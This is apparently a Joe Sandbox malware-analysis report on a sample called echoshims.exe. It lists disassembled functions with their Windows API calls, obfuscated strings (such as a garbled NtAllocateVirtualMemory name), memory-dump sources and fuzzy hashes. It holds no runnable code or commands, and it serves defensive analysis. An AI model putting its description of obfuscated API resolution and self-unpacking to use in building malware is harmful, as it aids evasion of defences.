Part of subcall function 0054CD40: GetTickCount.KERNEL32 ref: 0054CD4B
Part of subcall function 0054CD40: lstrlen.KERNEL32(00000000), ref: 0054CD75
Part of subcall function 0054CD40: GetTickCount.KERNEL32 ref: 0054CE46

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CountTick$Eventlstrcmpilstrlen
String ID:
API String ID: 637603502-0
Opcode ID: 2d2f2e3fbe74c29298e85fcd7aee63662782537c096ec4553a76af1252fd26e0
Instruction ID: 5b0adf2e79b9fe5d02f18012c9f31ded81c9a9bc9bd300cfe23b2fac3d25bd9c
Opcode Fuzzy Hash: 2d2f2e3fbe74c29298e85fcd7aee63662782537c096ec4553a76af1252fd26e0
Instruction Fuzzy Hash: 8431C17150930657D790AB75BC297963EA5BBE934EF044465E820C2192FF78C84CEF71

Uniqueness

Uniqueness Score: 0.01%

Function 005410B7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33UNIQUE

APIs

_snwprintf.NTDLL ref: 005410D6
CreateEventW.KERNEL32(?,00000001,?,?), ref: 005410F1
SetEvent.KERNEL32(00000000,?,00000001,?,?), ref: 005410FE
CloseHandle.KERNEL32(00000000), ref: 00541105
CloseHandle.KERNEL32(00000000), ref: 00541111

Strings

U, xrefs: 005410BA

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CloseEventHandle$Create_snwprintf
String ID: U
API String ID: 2675716504-1233722923
Opcode ID: 9d078988c29fa40d94fef5ae64dc1dba84aa6018030ca4694a837bfd0fa9b9a8
Instruction ID: 4974bf215a76322444bafb0a379be0cf0d05001e5c2486bc5eeed75c5e8f4160
Opcode Fuzzy Hash: 9d078988c29fa40d94fef5ae64dc1dba84aa6018030ca4694a837bfd0fa9b9a8
Instruction Fuzzy Hash: A6F0E9B5D10720A7C72297609C1DFDF3E39FF95716F040190F90A93291DB349985AFA9

Uniqueness

Uniqueness Score: 100.00%

Function 0054F574, Relevance: 9.0, APIs: 6, Instructions: 22fileCOMMON

APIs

MapViewOfFile.KERNEL32 ref: 0054F574
GetFileSize.KERNEL32(?,00000000), ref: 0054F583
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0054F58D
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0054F599
CloseHandle.KERNEL32 ref: 0054F5A0
CloseHandle.KERNEL32 ref: 0054F5A8

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: File$CloseHandleView$ComputeCrc32SizeUnmap
String ID:
API String ID: 741204879-0
Opcode ID: 804d9ea152979711dc9872ba769a7b7754d87d323277c1a9a56165721dcd0a98
Instruction ID: f605d6636c25f512b90f3448bfaf5b4ed14071382f997647748d6009a6a9844c
Opcode Fuzzy Hash: 804d9ea152979711dc9872ba769a7b7754d87d323277c1a9a56165721dcd0a98
Instruction Fuzzy Hash: BCE0E671104701AFD7011BA5BD6CBAD3AA8FB6D70FF040065F205C1150DB64498A7F65

Uniqueness

Uniqueness Score: 0.01%

Function 00547C6A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 147libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00548106

Strings

.U, xrefs: 00547F9E
ra:|, xrefs: 00548007
:yd(, xrefs: 00548076
Y<o, xrefs: 00547D64

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: LibraryLoad
String ID: .U$:yd($ra:|$Y<o
API String ID: 1029625771-744906291
Opcode ID: 8f5fa0b4d7a1c5433c884f866c4d7380cccaadebefedda1f61dc713b7336ad8d
Instruction ID: 2ffb3e6fe5ab496ffdb151af0efbe420bd05422a4acef16b5ae908844670de3d
Opcode Fuzzy Hash: 8f5fa0b4d7a1c5433c884f866c4d7380cccaadebefedda1f61dc713b7336ad8d
Instruction Fuzzy Hash: 12B1B7B4C49369DBDB20CF829A917DDBA71FB16304F6081C8D59A3B315DB740A86CF86

Uniqueness

Uniqueness Score: 100.00%

Function 0054CCB0, Relevance: 7.5, APIs: 5, Instructions: 37synchronizationCOMMON

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 0054CCC3
SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0054CCF6
ResetEvent.KERNEL32 ref: 0054CD0D
ReleaseMutex.KERNEL32 ref: 0054CD1B
CloseHandle.KERNEL32 ref: 0054CD27

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: ObjectWait$CloseEventHandleMutexReleaseResetSignalSingle
String ID:
API String ID: 3756552044-0
Opcode ID: 2976038c1ad17a58f0a6689a9b9332536c2b555e7bda38c29d7568822c972acb
Instruction ID: d393edc837e624e7d4865d6e5f1407bf4c6f8d32c6bfd2fa8daea4b30982b439
Opcode Fuzzy Hash: 2976038c1ad17a58f0a6689a9b9332536c2b555e7bda38c29d7568822c972acb
Instruction Fuzzy Hash: 7EF0F9349422619BDFA12B61EC29B993E65FBA435EF155130F902D11F0EB108C99FFA1

Uniqueness

Uniqueness Score: 0.01%

Function 0054F5CA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60UNIQUE

APIs

GetComputerNameW.KERNEL32(?), ref: 0054F5D6
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 0054F61D

Strings

X, xrefs: 0054F665
`7U, xrefs: 0054F5F8

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: ByteCharComputerMultiNameWide
String ID: X$`7U
API String ID: 4013585866-583042321
Opcode ID: f79ba9f215b4b8ccb111f99cc549d2fab09edeaa620c3f6601f2336d03b227b7
Instruction ID: dbbf09435cc33ffa0e60b2bcd1bd9e043138e17ed922a886dc353579b70d8b2b
Opcode Fuzzy Hash: f79ba9f215b4b8ccb111f99cc549d2fab09edeaa620c3f6601f2336d03b227b7
Instruction Fuzzy Hash: 2911407094620AAAEF10D7ACDD49BEA3FA9BB0530CF211035E141F20F1D7604E4A9B1A

Uniqueness

Uniqueness Score: 100.00%

Function 0054D059, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON

APIs

_snwprintf.NTDLL ref: 0054D073
GetModuleHandleW.KERNEL32(00000000), ref: 0054D0B0
GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0054D0D0

Strings

0, xrefs: 0054D096

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: HandleModule$_snwprintf
String ID: 0
API String ID: 960185367-4108050209
Opcode ID: 0eed8fc457916a0b51f3938fa804b45ba5a106c009ba8b981a09cef5fe32d0d1
Instruction ID: 180f8e0163c286a7f639a453f8ebe2a76cbdc18a980f3169386c89d11ceb3088
Opcode Fuzzy Hash: 0eed8fc457916a0b51f3938fa804b45ba5a106c009ba8b981a09cef5fe32d0d1
Instruction Fuzzy Hash: AF114471950718ABEB209BA0DC29FEE7A78FB04745F240159FA05B7180EB706648DF69

Uniqueness

Uniqueness Score: 0.03%

Function 0054FA30, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29stringCOMMON

APIs

lstrcpyW.KERNEL32(?,00557748), ref: 0054FA3B
lstrlenW.KERNEL32(?,?,00557748), ref: 0054FA42
GetTickCount.KERNEL32(?,?,00557748), ref: 0054FA54

Strings

x, xrefs: 0054FA77

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CountTicklstrcpylstrlen
String ID: x
API String ID: 974621299-2363233923
Opcode ID: 04c24a9ebc58489865633795c3def93c937c63d84febf9473c1869a4e79259fb
Instruction ID: 49020cf02733829bbb359d502c8a44bb96cc8b4c7fa08d56dd932c329979659f
Opcode Fuzzy Hash: 04c24a9ebc58489865633795c3def93c937c63d84febf9473c1869a4e79259fb
Instruction Fuzzy Hash: B0F055B36053196BC7101FE0ECC85063BA9EF94357B051071EC05DB212DB30C8488BE0

Uniqueness

Uniqueness Score: 0.02%

Function 0054F430, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26UNIQUE

APIs

_snwprintf.NTDLL ref: 0054F485

Strings

0;U, xrefs: 0054F43B
P9U, xrefs: 0054F464
0rU, xrefs: 0054F447

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: _snwprintf
String ID: 0;U$0rU$P9U
API String ID: 3988819677-3725892753
Opcode ID: 7d370daa48925b4a876641af903c7f20d68aee5b0ccff49999058eb666c0ae43
Instruction ID: fd3cc612b163307dba0ab28b0a2e6a8c4a6f1e2c926955b298cefe1b44e6b212
Opcode Fuzzy Hash: 7d370daa48925b4a876641af903c7f20d68aee5b0ccff49999058eb666c0ae43
Instruction Fuzzy Hash: 60E092B47545211387057264287AADE1C82FBC479AB500125B9066B3C1DC501D4503EE

Uniqueness

Uniqueness Score: 100.00%

Function 0054D119, Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

APIs

GetTickCount.KERNEL32 ref: 0054D119
GetTickCount.KERNEL32(?,00000000), ref: 0054D127
GetTickCount.KERNEL32(?,00000000), ref: 0054D138
WaitForSingleObject.KERNEL32(00000000), ref: 0054D18C

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CountTick$ObjectSingleWait
String ID:
API String ID: 2051767920-0
Opcode ID: 2796ba8c6cc2fbd0e1afdff9ec5bc64e9e6116d7840fc0fd7993d39e4fa2b567
Instruction ID: 64ab2a2f47e08ae4895bff89b99ab9ea059bce71f6a00be1dfae81bbadbea869
Opcode Fuzzy Hash: 2796ba8c6cc2fbd0e1afdff9ec5bc64e9e6116d7840fc0fd7993d39e4fa2b567
Instruction Fuzzy Hash: A7016D71900705ABD7005BA0EC6EBAE3E7DBB2430BF544014F112D22A0EBB49449EF54

Uniqueness

Uniqueness Score: 0.03%

Function 0054FDD0, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

APIs

_snwprintf.NTDLL ref: 0054FDEB
CloseHandle.KERNEL32(?), ref: 0054FE18
CloseHandle.KERNEL32(?), ref: 0054FE21
CloseHandle.KERNEL32(?), ref: 0054FE2A

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CloseHandle$_snwprintf
String ID:
API String ID: 2398838028-0
Opcode ID: 0203ea48ec785f98c0618973a7db8e2fe4b830cad8d182e540d8847d875a81e6
Instruction ID: 4a83de9cf815f99775bed9cc098d865f538b7edce01a5e8026449120a8bfcbd6
Opcode Fuzzy Hash: 0203ea48ec785f98c0618973a7db8e2fe4b830cad8d182e540d8847d875a81e6
Instruction Fuzzy Hash: 95F030B2910119ABCF10ABA0ED199EE7B79FB4831AF400195F905A2061EB318A54AFA0

Uniqueness

Uniqueness Score: 0.01%

Function 0054FCA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32stringCOMMON

APIs

lstrlenW.KERNEL32 ref: 0054FCB5
GetTickCount.KERNEL32 ref: 0054FCC7

Strings

x, xrefs: 0054FCEA

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: CountTicklstrlen
String ID: x
API String ID: 2992449761-2363233923
Opcode ID: 184cadd08a12e061c2af201b74b136a8b1f1b788c577e6996f679c5268977e82
Instruction ID: 1414ea66b7de873274b5df4d31f7b6f4721c3be259445e885d3ad9eb865be8a7
Opcode Fuzzy Hash: 184cadd08a12e061c2af201b74b136a8b1f1b788c577e6996f679c5268977e82
Instruction Fuzzy Hash: B5F020B76043156BE7201FE0EC88B063A69EF90356F040070FA05EF292EBB0C80487E0

Uniqueness

Uniqueness Score: 0.02%

Function 0054F4B5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30fileUNIQUE

APIs

_snwprintf.NTDLL ref: 0054F4FF
DeleteFileW.KERNEL32(?), ref: 0054F516

Strings

P9U, xrefs: 0054F4DA

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: DeleteFile_snwprintf
String ID: P9U
API String ID: 366827715-2256068451
Opcode ID: 814f2d74443a3adcfa14063526a89237060a89ebb9dda903f113cc4eba8a0ace
Instruction ID: af397d2dd8d819c345e0c356eddb3c7e6a47cb34eba324a653d9a0b0c68e46c5
Opcode Fuzzy Hash: 814f2d74443a3adcfa14063526a89237060a89ebb9dda903f113cc4eba8a0ace
Instruction Fuzzy Hash: 74F0A7F1A0052957CB10EB609C6DADF3768BB84349F0002E5F94697241DE705EC44BD9

Uniqueness

Uniqueness Score: 100.00%

Function 0054F840, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19UNIQUE

APIs

GetTempPathW.KERNEL32 ref: 0054F840
GetTempFileNameW.KERNEL32(?,?,?,?), ref: 0054F850

Strings

@uU, xrefs: 0054F85C

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: @uU
API String ID: 3285503233-3331488794
Opcode ID: dda3b64ea9bf13b0cd8a208a8ab757f61ed77cf6aa121a86e4c742fd79b43336
Instruction ID: 22bd1cae0bfa3ce6818323551bd5bcbec1b39ceb3ecc2a65dcdae10bb98faf60
Opcode Fuzzy Hash: dda3b64ea9bf13b0cd8a208a8ab757f61ed77cf6aa121a86e4c742fd79b43336
Instruction Fuzzy Hash: 97D05B7060432E57CA105BA56C1D9FB7F6CFB4539AF0005D1B90DC3111ED2089C49BE5

Uniqueness

Uniqueness Score: 100.00%

Function 00545EE5, Relevance: 5.1, APIs: 4, Instructions: 82COMMON

APIs

memset.NTDLL ref: 00545EEE
memset.NTDLL ref: 00545F7D
memset.NTDLL ref: 00545F93
memset.NTDLL ref: 00545FA9

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 50f9a5a8f3dfaa74b4191d30fa5b0324755fc58a817f32983d0f47c51cc4271d
Instruction ID: 237c635e4c67d197eda6116a042c5c76090b71186418602871ee4f6c7e6dc04e
Opcode Fuzzy Hash: 50f9a5a8f3dfaa74b4191d30fa5b0324755fc58a817f32983d0f47c51cc4271d
Instruction Fuzzy Hash: 3E31D4B1E00605ABDB08CFA4C9917EDBFB4FF58309F144169E506AB782E374A654DF84

Uniqueness

Uniqueness Score: 0.00%

Function 00545D95, Relevance: 5.1, APIs: 4, Instructions: 79COMMON

APIs

memset.NTDLL ref: 00545DA8
memset.NTDLL ref: 00545F7D
memset.NTDLL ref: 00545F93
memset.NTDLL ref: 00545FA9

Memory Dump Source

Source File: 00000014.00000002.1065576289.00541000.00000020.sdmp, Offset: 00540000, based on PE: true

Associated: 00000014.00000002.1065563119.00540000.00000004.sdmp
Associated: 00000014.00000002.1065610927.00551000.00000002.sdmp
Associated: 00000014.00000002.1065622363.00552000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_540000_echoshims.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 54d9eca2c62d6613cf1da50720834da213b6279962f30d4aea4b23a82ed8585a
Instruction ID: 9cab31fe713a370ff86d3998990835444c91f1b6fc7fd42e6ec4f35bc930ba6a
Opcode Fuzzy Hash: 54d9eca2c62d6613cf1da50720834da213b6279962f30d4aea4b23a82ed8585a
Instruction Fuzzy Hash: 4F3150B2E10F82E7E3058F64D801BA4B770FFE9305F205316E4D595642EB78A6A4DBC0

Uniqueness

Uniqueness Score: 0.00%

Analysis Process: echoshims.exe PID: 3460 Parent PID: 3712echoshims.exeUNIQUE

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3%
Total number of Nodes:	498
Total number of Limit Nodes:	7

Executed Functions

Function 003C1FF0, Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 65
memorynativeUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL ref: 003C202E
NtAllocateVirtualMemory.NTDLL ref: 003C20B5

Strings

Z, xrefs: 003C2061
A, xrefs: 003C2069
l, xrefs: 003C2075
YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY, xrefs: 003C201B
l, xrefs: 003C2071
l, xrefs: 003C206D
y, xrefs: 003C2059
w, xrefs: 003C2065
r, xrefs: 003C2055

Memory Dump Source

Source File: 00000015.00000002.1073582170.003C0000.00000040.sdmp, Offset: 003C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3c0000_echoshims.jbxd

Similarity

API ID: AllocateMemoryVirtualmemcpy
String ID: A$YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY$Z$l$l$l$r$w$y
API String ID: 2505947351-868024915
Opcode ID: 047df5982da8e25dbf8af6ee80a38e73a84f6eee4ccc4704b7323be633e6a9a6
Instruction ID: a2e2db0017f753db15e4f1ad0455e38c2116014d0c69089fb93aa79ed16abb24
Opcode Fuzzy Hash: 047df5982da8e25dbf8af6ee80a38e73a84f6eee4ccc4704b7323be633e6a9a6
Instruction Fuzzy Hash: 5D3101B0D043588BDB11CFA8D444A8DBFB1AF89314F24C19DD858AB382C77A994ACF91

Uniqueness

Uniqueness Score: 100.00%

Function 003C1EE0, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 73
nativeUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL ref: 003C1F41
NtProtectVirtualMemory.NTDLL ref: 003C1FC0

Strings

@, xrefs: 003C1F56
yyProtectairtual emory, xrefs: 003C1F03
V, xrefs: 003C1F6B
M, xrefs: 003C1F6F
Z, xrefs: 003C1F63
w, xrefs: 003C1F67

Memory Dump Source

Source File: 00000015.00000002.1073582170.003C0000.00000040.sdmp, Offset: 003C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3c0000_echoshims.jbxd

Similarity

API ID: MemoryProtectVirtualmemcpy
String ID: @$M$V$Z$w$yyProtectairtual emory
API String ID: 2440499307-3039725267
Opcode ID: 96cc53d405a8eab11c19a8cbb591400088f740866e02f9ec8298383fea3de41f
Instruction ID: 442a1e36bff19020e2d44fc05acb88c3b42c65123fd87a60628c3fe4d6226962
Opcode Fuzzy Hash: 96cc53d405a8eab11c19a8cbb591400088f740866e02f9ec8298383fea3de41f
Instruction Fuzzy Hash: C131D1B5D042688FDB10DF69C980B9DBBF4BB49304F1085AEE85CAB342D7359945CF51

Uniqueness

Uniqueness Score: 100.00%

Function 003ED119, Relevance: 13.5, APIs: 9, Instructions: 38
windowsynchronizationtimeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 003ED119
SetTimer.USER32(?,00000000), ref: 003ED121
GetTickCount.KERNEL32(?,00000000), ref: 003ED127
GetTickCount.KERNEL32(?,00000000), ref: 003ED138
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003ED15E
TranslateMessage.USER32(?), ref: 003ED174
DispatchMessageW.USER32(?), ref: 003ED17E
WaitForSingleObject.KERNEL32(00000000), ref: 003ED18C
DestroyWindow.USER32 ref: 003ED1AE

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CountMessageTick$DestroyDispatchObjectSingleTimerTranslateWaitWindow
String ID:
API String ID: 1391006589-0
Opcode ID: fa5093c5e306b2f4e2ae3787bb72a55717498f83b003b079c3d84fa41c1982b4
Instruction ID: 20e56722f34baf9373f7c91b2c5d96ca52d4217e6b7a586de0e3332850434e85
Opcode Fuzzy Hash: fa5093c5e306b2f4e2ae3787bb72a55717498f83b003b079c3d84fa41c1982b4
Instruction Fuzzy Hash: 5B0187B2A00701ABE7129BA5EC4CBBF3F7EBB04305F11402AF212E12B0DBB48401DB44

Uniqueness

Uniqueness Score: 0.03%

Function 003ED059, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
registryCOMMON

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 003ED073
GetModuleHandleW.KERNEL32(00000000), ref: 003ED0B0
RegisterClassExW.USER32(00000030), ref: 003ED0BD
GetModuleHandleW.KERNEL32(00000000,00000000), ref: 003ED0D0
CreateWindowExW.USER32(00000000,?,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 003ED0FF

Strings

0, xrefs: 003ED096

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: HandleModule$ClassCreateRegisterWindow_snwprintf
String ID: 0
API String ID: 1398201921-4108050209
Opcode ID: 4fba5d918060c3cc1347c5d06d150b9be83d9a5de756c1199a2ede4bf2dace78
Instruction ID: c8db4912b8dc8f64b6d78892b8d92fde85152c5290c21962cc5cc10bcccaee0f
Opcode Fuzzy Hash: 4fba5d918060c3cc1347c5d06d150b9be83d9a5de756c1199a2ede4bf2dace78
Instruction Fuzzy Hash: 70114471A40618BBEB229B91DC15FFE7A78FB04740F24016AFB05B62C0DB715644CB69

Uniqueness

Uniqueness Score: 0.03%

Function 003E103C, Relevance: 7.5, APIs: 5, Instructions: 46
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 003E1043
_snwprintf.NTDLL ref: 003E107F
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 003E1099
GetLastError.KERNEL32 ref: 003E10A5
CloseHandle.KERNEL32(00000000), ref: 003E1111

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: CloseCreateCurrentErrorHandleLastMutexProcess_snwprintf
String ID:
API String ID: 670123879-0
Opcode ID: ce8f0f0fe02c697eac2d3347b327b8917d8f2ce0e8abe3860264fabba8d1887a
Instruction ID: 8d5d1be1af4769926066de2360011c2baa736b5724586ed953898a82b7d7cc10
Opcode Fuzzy Hash: ce8f0f0fe02c697eac2d3347b327b8917d8f2ce0e8abe3860264fabba8d1887a
Instruction Fuzzy Hash: 1A01F775B00159A7DF63EB92AC497FE777AEB80341F1006A6E709D2281DF304E44CA91

Uniqueness

Uniqueness Score: 0.01%

Function 003ECCB0, Relevance: 7.5, APIs: 5, Instructions: 37
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 003ECCC3
SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 003ECCF6
ResetEvent.KERNEL32 ref: 003ECD0D
ReleaseMutex.KERNEL32 ref: 003ECD1B
CloseHandle.KERNEL32 ref: 003ECD27

Memory Dump Source

Source File: 00000015.00000002.1073599898.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000015.00000002.1073591288.003E0000.00000004.sdmp
Associated: 00000015.00000002.1073613030.003F1000.00000002.sdmp
Associated: 00000015.00000002.1073621005.003F2000.00000004.sdmp
Associated: 00000015.00000002.1073629446.003F7000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3e0000_echoshims.jbxd

Similarity

API ID: ObjectWait$CloseEventHandleMutexReleaseResetSignalSingle
String ID:
API String ID: 3756552044-0
Opcode ID: 88c83838a7d572b027e16ae84eae1b71fc4fe016ccbcdbc8cb6ec6672a4b469b
Instruction ID: b0cc44df3200b469fc44e3179a8ef2dfce670d37f61d64afb264d398f2a0ac1f
Opcode Fuzzy Hash: 88c83838a7d572b027e16ae84eae1b71fc4fe016ccbcdbc8cb6ec6672a4b469b
Instruction Fuzzy Hash: ACF0F9306501A1ABDF232B67AC09B7F3E69AB44351F266330F910E11F0EB16C843D7A1

Uniqueness

Uniqueness Score: 0.01%

Function 003C22CE, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 22
stringCOMMON

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpW.KERNELBASE ref: 003C22FB

Strings

ov8oTdn, xrefs: 003C22E9
_E9e3X1YKeRS, xrefs: 003C22E2

Memory Dump Source

